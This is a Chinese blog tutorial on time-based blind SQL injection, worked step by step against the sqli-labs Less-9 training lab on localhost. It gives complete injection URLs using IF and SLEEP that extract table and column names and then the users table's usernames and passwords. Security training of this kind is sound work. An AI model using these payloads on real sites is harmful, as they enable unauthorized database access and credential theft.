SQL注入——基于时间的盲注(sqli-labs less9)

最新推荐文章于 2024-04-10 11:04:17 发布
最新推荐文章于 2024-04-10 11:04:17 发布
阅读量970 收藏 7
点赞数 1
文章标签: mysql mariadb 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuan114012/article/details/124897330
版权

一.基于时间得盲注

适用场景:没有数据回显,条件正确与否结果一样

利用方式:构造判断条件,添加sleep,逐个猜测(盲猜)

1.所需语法与函数 

IF表达式

IF( expr1 , expr2 , expr3 )  
#expr1 的值为 TRUE,则返回值为 expr2 
#expr1 的值为FALSE,则返回值为 expr3

expr1 的值为 TRUE,则返回值为 expr2 expr1 的值为FALSE,则返回值为 expr3

mysql> select if(1=1,1,0);   #条件为真 返回1
+-------------+
| if(1=1,1,0) |
+-------------+
|           1 |
+-------------+

mysql> select if(1=2,1,0);   #条件为假 返回0
+-------------+
| if(1=2,1,0) |
+-------------+
|           0 |
+-------------+

 count(列名)    #查询当前列中的元组的个数

mysql> select username from users;
+----------+
| username |
+----------+
| Dumb     |
| Angelina |
| Dummy    |
| secure   |
| stupid   |
| superman |
| batman   |
| admin    |
| admin1   |
| admin2   |
| admin3   |
| dhakkan  |
| admin4   |
+----------+

mysql> select count(username) from users;
+-----------------+
| count(username) |
+-----------------+
|              13 |
+-----------------+

sleep(n) 函数  睡眠n秒后执行。 

select length(database())=8;  #截取长度如果是8,返回1,否则返回0
select if(1=1,1,0)            #判断赋值
select sleep(1)               #睡眠n秒后执行
select sleep(if(select length(database()=8),1,0))  #如果数据库长度是8 睡1秒
select if(length(database=8),sleep(1),0)         #等价于上面

二.举例说明

基于时间的盲注,以sqli-labs less-9 (第9关)为例

1.判断数据库名的长度以及名字

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(length(database())=8,sleep(5),0) -- -               #有明显延迟说明数据库名的长度是8
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if (ASCII(substr(database(),1,1))=115,sleep(5),0) -- -  #有5s延迟说明第数据库的第一个字母对应的ASCII码是115 也就是s  以此类推数据库名security

判断出数据库名为security

2.判断库中含有的表名长度以及名字

2.1 使用count()函数,先确定表个数,然后再确定各个表的长度,再确定表名字

 

# 确定表的个数为4个
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and 
if ((SELECT COUNT(table_name) FROM information_schema.tables WHERE TABLE_schema='security')=4,SLEEP(5),0) -- - 

# 确定第一个表名的长度
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and 
if(LENGTH((SELECT table_name from information_schema.TABLES where table_schema='security' limit 0,1))=6,sleep(5),0) -- -


# 确定表名
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and 
if(ASCII(SUBSTR((SELECT table_name from information_schema.TABLES where table_schema='security' limit 0,1),1,1))=101,SLEEP(5),0) -- --

依次类推 确定出所有表名 emails,referers,uagents,users.

2.2 一个技巧,不需猜测表名,表名长度

这里提供一个技巧,不需要猜测表名的个数以及表名的长度,语法如下:

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and 
if(ASCII(SUBSTR((SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_schema='security' LIMIT 0,1),7,1))>=1,SLEEP(5),0) -- -

        根据这一步,依次往后测定如果为空字符的话,意味着第一个表名结束。比入依次测定出第一个表名的前6个字母为 emails 测定第7个的时候让ASCII>=1 没有延迟,说明这是一个空字符(ASCII码对应的0是空字符),意味着表名的结束,为了正确性,可以继续测定第8个,依旧是空字符。按照这个办法依次猜测后面的表名  分别为emails,referers,uagents,users.然后依照此办法依次猜测字段名,字段名的值。

2.3 使用group_concat()语句,简单方便

        此方法将字段名下的所有值集中到一行,用此函数可以不用确定表的个数,不用确定表名,可以把所有表名加在一起的长度确定下来。

# 确定所有表名加在一起的长度
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and 
IF(length((SELECT GROUP_CONCAT(table_name) from information_schema.tables where table_schema='security'))=29,sleep(5),0) -- -
# group_concat()语句默认用逗号分隔,所以表名长度加逗号的长度一共是29

# 依次猜测29个字符即可猜出表名
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and 
if(ASCII(SUBSTR((SELECT group_concat(table_name) from information_schema.TABLES where table_schema='security'),1,1))=101,SLEEP(5),0)  -- -

3.判断字段名,为方便使用group_concat()语句 

# 确定出users表中所有字段名的长度加上逗号的长度为20
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and 
if(length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))=20,sleep(5),1)   -- -

# 依次确定字段名
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and 
if(ASCII(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1))=105,sleep(5),0)-- -

# 第一个字母对应的ascii码是105 
# 依次进行猜测 猜测出字段名:id,username,password

4.同理得到username 和password的值。

4.1 username的值

# 猜出所有username值加上逗号得长度是91
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and 
if(length((select group_concat(username) from security.users))=91,SLEEP(5),0) -- -

#猜测出username得值
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and 
IF(ASCII(substr((select group_concat(username) from security.users),1,1))=68,SLEEP(5),0)-- -

Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

4.2 password的值

# 猜测出password的值加上逗号的长度是96
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and 
if(length((select group_concat(password) from security.users))=96,SLEEP(5),0)  -- -

# 猜测值
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and 
IF(ASCII(substr((select group_concat(password) from security.users),1,1))=68,SLEEP(5),0)-- -
Dumb,
I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

5.最终结果

username:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

password:
Dumb,
I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

yuan114012
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
SQL注入-时间盲注
acepanhuan的博客
02-11 2653
SQL注入盲注学习
sql时间盲注另外两种方式(benchmark,heavy query)
weixin_34378045的博客
05-19 366
在某些情况下进行时间盲注的时候,如果sleep()函数无法使用,我们可以使用以下两种方式来达到延时的效果。 1.benchmark() benchmark是Mysql的一个内置函数,其作用是来测试一些函数的执行速度。benchmark()带有两个参数,第一个是执行的次数,第二个是要执行的函数或者是表达式 mysql> select BENCHMARK(10000,md5('a')...
【Less-9/10】盲注时间盲注
ssrf
10-30 483
目录一、知识铺垫二、时间盲注复现1、测试注入点2、爆表名3、爆列名4、爆内容 一、知识铺垫 sql的if表达式: 语法:IF( expr1 , expr2 , expr3 ) expr1 的值为 TRUE,则返回值为 expr2 expr1 的值为FALSE,则返回值为 expr3 SELECT IF(TRUE,1+1,1+2); -> 2 SELECT IF(FALSE,1+1,1+2); -> 3 SELECT IF(STRCMP("111","222"),"不相等","相等
SQL注入学习——时间盲注详解 sqli-labs(Less 9)
未完成的歌~的博客
09-01 4283
Less-9 基于时间的双引号盲注
SQL注入——sqli-labs-Less-9时间盲注
m0_63563528的博客
04-06 585
时间盲注 和 Bool 盲注很像,区别就是 “参照物” 的不同
PHP、Apache环境部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程可能会遇到各种...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs PoC 脚本.rar
08-09
课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注,POST数据盲注。 资料...
时间盲注脚本——以sqli-labs第十关为例
weixin_52450702的博客
12-14 510
时间盲注脚本
sqli-labs Less-9 时间盲注
m0_63711447的博客
04-12 1017
使用的函数补充: if(condition,A,B)如果条件condition为true,则执行语句A,否则执行语句B eg.select if(1>2,3,4); 返回的结果为4(若是在MySQL命令行使用,应先use xxx数据库) 可组合使用,当前数据库为security ...
SQLi LABS Less 9 时间盲注
热门推荐
wangyuxiang946的博客
06-22 1万+
SQLi 第九关,SQLi-LABS Less-9,SQLi-LABS Less 9,SQLiLABS Less9,SQLi Less 9
渗透测试-SQL注入之布尔盲注时间盲注
lza20001103的博客
04-20 2806
渗透测试-SQL注入之布尔盲注时间盲注
sqli-labs攻关2(布尔盲注时间盲注)
qwzf
07-22 908
前言 之前已经通过sqli-libs攻关的方式,总结过SQL注入的简单注入和双注入。所以这次继续通过sqli-libs攻关的方式总结SQL注入的布尔盲注时间盲注。 正文 ...
【针对sqli-labs第9关的时间盲注python脚本】
AA8j的博客
09-09 706
效果图 源码 #!/usr/bin/python # -*- coding: utf-8 -*- # @Time : 2021/9/7 10:20 # @Author : AA8j # @Site : # @File : Time-based-blind-SQL-injection.py # @Software: PyCharm # @Blog : https://blog.csdn.net/qq_44874645 import binascii import request
SQL注入——sqli-labs-Less-9时间盲注_sqliless9,2024年最新面试宝典
最新发布
2401_84183070的博客
04-10 600
时间盲注,通过时间函数使SQL语句执行时间延长,从页面响应时间判断条件是否正确的一种注入方式。
sqli-labs第15关——基于post型的时间盲注,使用sqlmap工具
m0_73752956的博客
08-29 413
本关属于时间注入,基于源码分析,闭合字符是单引号。由于过程较复杂,这里使用sqlmap跑数据。这样我们就跑完了所有数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值